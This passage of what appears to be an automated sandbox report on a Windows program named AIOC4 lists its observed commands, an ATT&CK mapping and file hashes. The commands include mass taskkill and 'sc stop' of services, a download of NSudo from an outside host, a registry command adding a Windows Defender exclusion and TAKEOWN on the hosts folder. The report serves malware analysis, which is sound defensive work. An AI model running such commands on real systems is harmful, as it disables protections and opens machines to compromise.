7⤵
PID:2612

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
PID:3060

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:2228

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:2240

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:1228

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2432

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
PID:2860

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
- Kills process with taskkill
PID:2488

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:1500

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:2560

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:2708

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
- Kills process with taskkill
PID:2692

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
- Kills process with taskkill
PID:2980

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:2464

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
- Kills process with taskkill
PID:2152

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
PID:2900

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2216

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:2840

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:2700

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:960

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:2404

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
PID:2008

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
PID:2144

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:804

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2032

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
PID:3040

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:1536

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2396

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
- Launches sc.exe
PID:2628

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
PID:1556

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
PID:2132

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
PID:2696

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
- Launches sc.exe
PID:3016

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
- Launches sc.exe
PID:2912

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
- Launches sc.exe
PID:2748

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
PID:2824

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
PID:2256

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:2116

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:880

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:2156

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2960

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:1344

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:1148

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:2648

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2864

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
- Kills process with taskkill
PID:1820

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:2720

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
- Kills process with taskkill
PID:1212

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
PID:2412

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:2640

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:2916

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:2260

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:568

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:1400

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
- Kills process with taskkill
PID:2348

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
- Kills process with taskkill
PID:2144

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:968

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
- Kills process with taskkill
PID:2396

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
- Kills process with taskkill
PID:528

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2652

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
PID:1728

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:1616

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:2316

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:2232

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:2116

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:880

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
- Kills process with taskkill
PID:2632

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:1404

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:2432

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:2860

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2488

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
- Kills process with taskkill
PID:2128

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:2532

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
- Kills process with taskkill
PID:2548

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
- Kills process with taskkill
PID:2284

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:688

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:2784

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
- Kills process with taskkill
PID:2248

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:2900

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
PID:1356

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
- Kills process with taskkill
PID:2760

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:1036

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:1016

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:988

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:1884

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
- Kills process with taskkill
PID:2992

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
- Launches sc.exe
PID:2744

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
PID:2296

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
PID:2660

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:3044

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:2684

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
PID:3028

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2100

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
PID:3060

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:1728

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:2932

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
PID:2308

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
PID:596

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
- Launches sc.exe
PID:2148

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
- Launches sc.exe
PID:2596

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:2000

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
PID:1644

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:992

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:1500

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:2864

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2604

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:2880

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:3052

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
- Kills process with taskkill
PID:2216

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:2812

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2668

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\J.R.A"
6⤵
PID:596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C MD "C:\ProgramData\J.R.A"
6⤵
PID:1596

C:\Program Files\AIOC4\aria2\x64\aria2c.exe
"C:\Program Files\AIOC4\aria2\x64\aria2c.exe" http://www.qbgxl.com/Tools/NSudoLauncher.7z -s 20 -x 10 -d "C:\Program Files\AIOC4\AIOC_Cache\Tools" -o "NSudoLauncher.7z" --check-certificate=false --async-dns=false --async-dns-server=114.114.114.114,61.160.195.64,8.8.8.8
6⤵
- Executes dropped EXE
PID:2356

C:\Program Files\AIOC4\7-Zip\x64\7z.exe
"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2500

C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:T -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files\AIOC4\\" /t REG_DWORD /d 0 /f
6⤵
- Executes dropped EXE
PID:2520

C:\Program Files\AIOC4\7-Zip\x64\7z.exe
"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C MD "AIOC_Cache\UpdateError\"
6⤵
PID:524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Program Files\AIOC4\AIOC_Cache\1444207646.bat"
6⤵
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh interface show interface
7⤵
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y
6⤵
PID:1212

C:\Windows\system32\takeown.exe
TAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2856

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4620698681993443988-1150388379-1705637073-261866941-1921359375-12395034751356897019"
1⤵
PID:2456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4108929071267034434-1564179042-1170907077-350792762-1099299484-15379654881974395236"
1⤵
PID:2624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1668545557-10335576611933243229-16107651571241938861663500660-21355110542110523199"
1⤵
PID:2728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1808014200-1906962486-99600194514016938651094476949-116669220817547529721739166267"
1⤵
PID:2972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\AIOC4\7-Zip\x64\7z.dll

Filesize
1.6MB

MD5
3c0e5f27997c83592a01feb4c1fc0754

SHA1
3d7920deb74e340a1ccac024b3f8239eb436c11f

SHA256
4d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243

SHA512
83e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe

Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe

Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe

Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\AIOC4.exe

Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe

Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe

Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe

Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe

Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe.config

Filesize
294B

MD5
312788103822de83bfcc14977cf85ce2

SHA1
ad849ac3d9f865f51233ef91069b195768a72e08

SHA256
42bb5911dc77bee5fef62a7557d76f57e03a615900ebc720cd0a8b7573e3fa3b

SHA512
dd8140619b7b31b0195671080f3ee4a18197458835fc9c38e3a5f02c15b539ba92dcd978bf0231ed4857e3a0b9215a8df860503099542bf5b0d87821ff0b2558

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XML

Filesize
3KB

MD5
d2b5064c27616136cfedadb391a27de2

SHA1
357f45eda635ef54074d57bda4cb499b6a0f51bc

SHA256
249938dd3dad92a65a9e6e1a5103b1d17e82afeb6dc2880273b901e08631e49d

SHA512
0433bc503f78eed90f6ce99abba3c9a7e0d7ae83c6c12e122ee1dd0d6636fae8253727e845d9a5ec2da23eb4db85c5a2fc2240c1af010ae71cc00ad29dc132f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z

Filesize
2.5MB

MD5
bf1324d35b37d4c2283ca20351b05aea

SHA1
b09912a252b29a2da6d869cfee40aff247b49e8a

SHA256
e0eb38802df4fb7d07823337b5c6da941f99b189defc89d35d2df80a5a6d0488

SHA512
f1d9169ad65d54bd8297ac294ca6791ea37c9a739e0805c355640bde88acf20f433a142c175908a533ce18bcc2b9bdcb2a14ac472b8e4d0845b1410bae36d380

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudo.json

Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.pdb

Filesize
2.0MB

MD5
84a46255a1d093ac022be86b316a715b

SHA1
9bba555d9226c454bf886228bd8d411d4006d1f3

SHA256
3c0ce2e72e82110faa6f7ee43d66da1b65ae886754644263cccb4bd1beaffb14

SHA512
379bb59da1e0aded1b28535aca3312c5cf61d6a7e969100cf3c889a8b62b3c6cbb359b04c4105a815e9e7f7411494420842c00a8b355abf51b0d59cbcc54652e

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.pdb

Filesize
4.0MB

MD5
859d1a5661742c998f3bce668de4b594

SHA1
673e8dc32a0a13f25431ac82f7b6498ee512552a

SHA256
b7e2c43d68b6a849e46305f7313ec161f994c38609750d6a788ee8944e8b1b24

SHA512
550268f514dc641101b0f0cd6453a7cbb7076f9fca2e72e7372d42cf5d5eb2bbf773ceae1ae2245021cca00f5f0b25886edafa2fd5bcbd7140e8b6811dd92578

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\NSudo.bat

Filesize
234B

MD5
943b19a7ab8b31c13d6359345389e802

SHA1
562ee7a4b7f481fb43b1cf55144de39005dadab4

SHA256
1b770ee7c2c58cc069d992cfd13def84c11cf3ed51559f365f4fed829359b54d

SHA512
df90f2f716acbccbcdbb64981bf3f8727e34ecb8420c32c3bdc2f69e3e9edaeb31e4f815b95ed0b0ae60a86349fa39b81b6030848862403554bb00fcfde24967

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudo.json

Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe

Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe

Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\CSkin.dll

Filesize
2.6MB

MD5
64788240f6be72aa31ee2ec5fd511bd0

SHA1
c762fc8df14fc668de1954f80c5d5865b2a4ed8f

SHA256
bd4c6bf0564d0df979fdd370dfefb7f0038a041c05f1a4185ba60b8c1554e351

SHA512
421b71001f28f2ba134ab38ac8b0d84d4e8bba468c122691b69bfd795121bfc64a61f8b22768c44b8d7f88c26c86af7261adbd8c077e16ed808f1690b3b546b3

Download Submit
C:\Program Files\AIOC4\DemoControls.dll

Filesize
38KB

MD5
676aaa728ea0244ac1db9485063b0a55

SHA1
4aca0bace946103ee5a7f0be4b6d81a5132ed213

SHA256
a0e9c2c3f1ddc3c849b793e2a0f4c241ba36613e891533d34ab98f13cd0692e4

SHA512
17e5e21f10c982438b3909a3f0ffeb532e5f9b134439bcfc8e4f33ab2f7b11349d6dc1afe8256e338f39e3034a51f7029dc9f46fb2c0a4320994602e10b2103b

Download Submit
C:\Program Files\AIOC4\Language\801A048D8E177F0C7D7B71C4336E985F\zh-CN.ini

Filesize
23KB

MD5
43bfcf915e323fe9d566d21c16bb6b44

SHA1
ad4838c856cc273fe60e5318812fe8ba95b28ddf

SHA256
c931cbca45d0afc47b4974ca146cb9f58ac1f26b71ec706940c2c7962dc1edc8

SHA512
1ea3b3e9b96089388e0b5ab04ee68fa365367801a4c4b20c7bf4e54449d90aa267a9d80e079d2ae3c4a5b5564bb9e978c6bbe4bf7223dc4571668b29afdb0ebb

Download Submit
C:\Program Files\AIOC4\MetroFramework.dll

Filesize
345KB

MD5
34ea7f7d66563f724318e322ff08f4db

SHA1
d0aa8038a92eb43def2fffbbf4114b02636117c5

SHA256
c2c12d31b4844e29de31594fc9632a372a553631de0a0a04c8af91668e37cf49

SHA512
dceb1f9435b9479f6aea9b0644ba8c46338a7f458c313822a9d9b3266d79af395b9b2797ed3217c7048db8b22955ec6fe8b0b1778077fa1de587123ad9e6b148

Download Submit
C:\Program Files\AIOC4\Newtonsoft.Json.dll

Filesize
528KB

MD5
8f6875148b45c300b95514cb40703c2e

SHA1
0015b8e21d84e0f6f174cf71b63651bad94582df

SHA256
ea7fd75e2bb069699d4da09f3601d70ca8e401f58949178cdbf2c5928720daa1

SHA512
e0670c00e0c5cb0e0e1c691f053a53de121e1771cffb17b2d08b8cc3f0498bdde3c6efe1419fd74103952a327c26bb6f29e5f817965873f8391ee8b8be80a6fb

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe

Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe

Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe

Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe

Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\StartNetApp.exe

Filesize
513KB

MD5
b8898b34fd4a62c12bd9828e22ac3e1d

SHA1
6ceea0d3619fec5eedb8fa8ecfe37cc5defc87a8

SHA256
